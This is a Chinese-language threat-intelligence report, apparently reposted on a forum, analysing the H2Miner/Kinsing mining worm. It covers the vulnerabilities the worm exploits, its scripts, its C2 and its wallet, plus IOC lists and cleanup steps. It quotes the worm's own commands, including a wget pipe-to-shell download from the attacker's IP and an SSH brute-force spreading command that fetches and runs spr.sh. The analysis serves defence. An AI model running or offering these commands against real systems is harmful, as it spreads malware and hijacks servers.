一、概述
腾讯安全威胁情报中心检测到H2Miner挖矿蠕虫变种近期活跃。H2Miner是一个linux下的大型挖矿僵尸网络，已被发现通过多个高危漏洞入侵Linux系统，并利用漏洞在企业内网或云服务器中横向扩散。腾讯安全威胁情报中心评估约有数千台服务器中招，腾讯安全专家建议相关企业尽快排查服务器被入侵的情况，及时清除H2Miner挖矿蠕虫病毒。

腾讯安全威胁情报中心本次捕获的H2Miner挖矿蠕虫样本会下载恶意脚本及恶意程序进行挖矿牟利，横向扫描扩大攻击面并维持与远程服务器（C2）通信，令服务器变成黑客控制的肉鸡。同时，具有卸载云服务器安全软件、删除云服务器镜像的能力，会给企业云服务器安全带来严重影响。

H2Miner挖矿蠕虫利用的高危漏洞包括：
Redis未授权RCE；
Solr dataimport RCE(CVE-2019-0193)；
Hadoop Yarn REST API未授权RCE(CVE-2017-15718)；
Docker Remote API未授权RCE；
ThinkPHP5 RCE；
Confluence 未授权RCE(CVE-2019-3396)；
SaltStack RCE（CVE-2020-11651）
等多个Web应用漏洞。

此次H2Miner变种更新了C2服务器地址，在横向移动时会从/.ssh/config, .bash_history, /.ssh/known_hosts等多个文件中搜索目标机器和认证信息，并利用搜索得到的userlist、hostlist、keylist、sshports进行组合尝试爆破登陆，从而扩大其攻击范围。

腾讯安全系列产品已针对H2Miner挖矿蠕虫病毒应急响应，建议相关企业参考如下清单加以排查：




更多产品信息，请参考腾讯安全官方网站23aK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6K6i4K6u0W2N6r3g2F1j5$3g2F1N6q4)9J5k6h3y4G2L8g2)9J5c8R3`.`.

二、样本分析
Docker是一个开源的应用容器引擎，开发者可以打包他们的应用以及依赖包到一个可移植的容器中，然后发布到任何流行的LINUX机器上，也可以实现虚拟化。Docker swarm 由docker官方提供，是一个将docker集群变成单一虚拟的docker host工具，使用标准的Docker API，能够方便docker集群的管理和扩展。使用docker swarm的时候，管理的docker 节点上会开放一个TCP端口2375（或2376）。

攻击者利用未受保护的开放Docker API端口进行攻击，并执行恶意命令：
wget -q -O – http[:]//93.189.43.3/d.sh | sh

d.sh执行以下操作：
1.禁用SELINUX并清除系统日志：echo SELINUX=disabled >/etc/selinux/config；
2.卸载阿里云骑士和腾讯云镜；
3.清除竞品挖矿木马；
4.杀死正在运行的恶意Docker容器并删除它们的映像；
5.下载恶意程序“kinsing”并运行；
6.通过crontab定时任务每分钟下载和执行shell脚本；
7.删除竞品挖矿木马的crontab定时任务。

下载得到的kinsing采用Golang编写，被编译为Linux平台可执行程序，主要有以下功能：
1.下载文件并执行；
2.启动和维持挖矿程序；
3.与C&C服务器通信，接收并执行远程命令；
3.利用masscan对外扫描；
4.针对redis服务进行爆破攻击；
5.下载shell脚本http[:]//93.189.43.3/spre.sh，以进行横向移动。

受影响的主机会以http的方式与C&C服务器185.154.53.140进行通信，其中肉鸡的信息在http头部中标识。

Kinsing释放门罗币挖矿木马到/tmp/kdevtmpfsi，然后启动连接矿池xmr-eu1.nanopool.org挖矿，配置中使用门罗币钱包为：
46V5WXwS3gXfsgR7fgXeGP4KAXtQTXJfkicBoRSHXwGbhVzj1JXZRJRhbMrvhxvXvgbJuyV3GGWzD6JvVMuQwAXxLZmTWkb

挖矿使用矿池和钱包与腾讯安全此前捕获到的版本(H2Miner黑产团伙利用SaltStack漏洞入侵企业主机挖矿，已获利370万元dd3K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8X3g2x3L8W2q4^5j5g2)9#2k6X3S2j5P5r3S2z5K9s2W2I4N6f1!0f1K9q4M7%4f1g2)9J5z5g2!0q4y4q4!0n7z5q4!0m8c8q4!0q4y4q4!0n7c8q4!0n7c8W2!0q4y4#2)9&6y4q4!0m8z5q4!0q4y4#2)9&6b7g2)9^5y4q4!0q4y4#2)9&6b7W2!0n7z5q4!0q4y4g2)9&6x3q4)9^5b7#2!0q4x3#2)9^5x3q4)9^5x3R3`.`.

横向移动
Spre.sh是用于在网络中横向传播H2Miner的shell脚本。为了发现攻击目标并找与其相对应的身份验证的信息，脚本会从 /.ssh/config, .bash_history, /.ssh/known_hosts进行搜索和匹配。

利用收集到的信息，恶意脚本尝试通过SSH连接到每个主机，使用每个可能的用户和密钥组合进行爆破登陆，以便在网络中的其他主机或容器上下载和运行shell脚本Spr.sh，spr.sh与最初攻击时的d.sh相同。

以下SSH命令用于在网络中传播H2Miner：
ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host -p$sshp "sudo curl -L http[:]//93.189.43.3/spr.sh|sh; sudo wget -q -O - http[:]//93.189.43.3/spr.sh|sh;"

三、手动清除H2Miner建议：
1、查找路径为/tmp/kinsing、/tmp/kinsing2、/tmp/kdevtmpfsi的进程，将其kill掉并删除对应的文件；
2、查找crontab任务中包含“195.3.146.118”的相关项并删除。
IOCs
IP
195.3.146.118
142.44.191.122
185.92.74.42
217.12.221.244
93.189.43.3
185.154.53.140

Md5

URL
https[:]//bitbucket.org/tromdiga1/git/raw/master/kinsing
https[:]//bitbucket.org/tromdiga1/git/raw/master/for
http[:]//93.189.43.3/kinsing
http[:]//93.189.43.3/kinsing2
http[:]//93.189.43.3/spr.sh
http[:]//93.189.43.3/spre.sh
http[:]//93.189.43.3/a.sh
http[:]//93.189.43.3/cron.sh
http[:]//93.189.43.3/d.sh
http[:]//93.189.43.3/ex.sh
http[:]//93.189.43.3/h2.sh
http[:]//93.189.43.3/j.sh
http[:]//93.189.43.3/lf.sh
http[:]//93.189.43.3/p.sh
http[:]//93.189.43.3/pa.sh
http[:]//93.189.43.3/s.sh
http[:]//93.189.43.3/t.sh
http[:]//93.189.43.3/tf.sh
http[:]//93.189.43.3/al.sh

参考链接：
797K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3u0D9L8$3N6Q4x3X3g2F1M7$3k6G2j5%4g2K6i4K6u0W2L8X3g2@1i4K6u0r3k6r3!0U0K9$3g2J5i4K6u0V1M7X3g2E0L8%4c8W2i4K6u0V1j5i4m8A6i4K6u0V1N6h3&6S2N6i4c8Z5L8%4u0A6P5X3g2V1i4K6u0V1j5h3y4U0k6i4y4K6i4K6u0V1N6Y4g2D9L8X3g2J5j5h3u0A6L8r3W2@1P5g2)9J5c8R3`.`.

H2Miner黑产团伙利用SaltStack漏洞入侵企业主机挖矿，已获利370万元
f2fK9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6E0M7q4)9J5k6i4N6W2K9i4S2A6L8W2)9J5k6i4q4I4i4K6u0W2j5$3!0E0i4K6u0r3M7#2)9J5c8X3g2x3L8W2q4^5j5g2)9#2k6X3S2j5P5r3S2z5K9s2W2I4N6f1!0f1K9q4M7%4f1b7`.`.

[培训]科锐逆向工程师培训第53期2025年7月8日开班！